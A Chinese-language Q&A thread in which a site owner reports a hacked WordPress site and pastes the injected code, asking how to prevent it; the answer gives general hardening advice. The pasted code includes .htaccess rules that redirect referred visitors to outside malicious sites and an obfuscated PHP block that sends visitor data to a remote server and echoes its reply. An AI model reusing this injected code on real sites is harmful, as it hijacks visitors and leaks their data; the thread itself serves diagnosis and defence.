-1

我为客户建立了一个 wordpress 网站。几天后,客户报告说该网站已被谷歌阻止恶意软件内容。当我查看该站点时,我发现代码中有一些更改,例如 .htaccess 的代码与之前的代码不同。 

 RewriteEngine On

 RewriteBase /

 RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)

 RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

 RewriteRule ^.*$ http://clubatleticoestrada.org.ar/awas.html?h=1110720 [L,R]

</IfModule>



<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://halisahamiz.com/eehs.html?h=1110720 [L,R]
</IfModule>


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://zabetonom.ru/mhos.html [L,R]
</IfModule>


RewriteEngine On

RewriteBase / 



# MCCL



# END MCCL

并且 index.php 包含以下内容:

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
     curl_close($stCurlHandle); 
}
}

这种攻击是如何发生的,我怎样才能在这种攻击的未来防止自己?

在重置站点时,我发现公共 Html 文件夹之外的一些文件受到了影响。现在有人如何管理它?

4

1 回答 1

2

整个大型库不足以解释如何执行“黑客攻击”。攻击网站的方法和工具有很多。除了非常常见的SQL 注入跨脚本和密码窃取之外,还有专业人士使用的复杂工具。如果我了解发生了什么,他们已经重定向了您的网站。我只能建议确保您的服务器上有最新的软件更新,使用像这样或像Acunetix这样的“检查工具”检查您的站点. 黑客也会这样做来寻找易受攻击的网站。如果您认为重新加载备份可以解决问题,您可能会感到意外。黑客使用下载后门并返回您的站点。所以更改密码可能不起作用。我建议你在清理它时要非常小心。还要询问您的提供商,他们是否曾在同一台服务器上被黑客入侵过任何其他网站。在这种情况下,您可以确定服务器上有后门(外壳)。在这种情况下,不是您的问题,而是提供商有责任解决漏洞并清理服务器。这是最常见的情况。以上所有内容只是为了大致了解问题的复杂性,我完全同意 Adrien 的观点,即这个主题是针对互联网安全论坛的。

于 2013-05-16T16:42:08.430 回答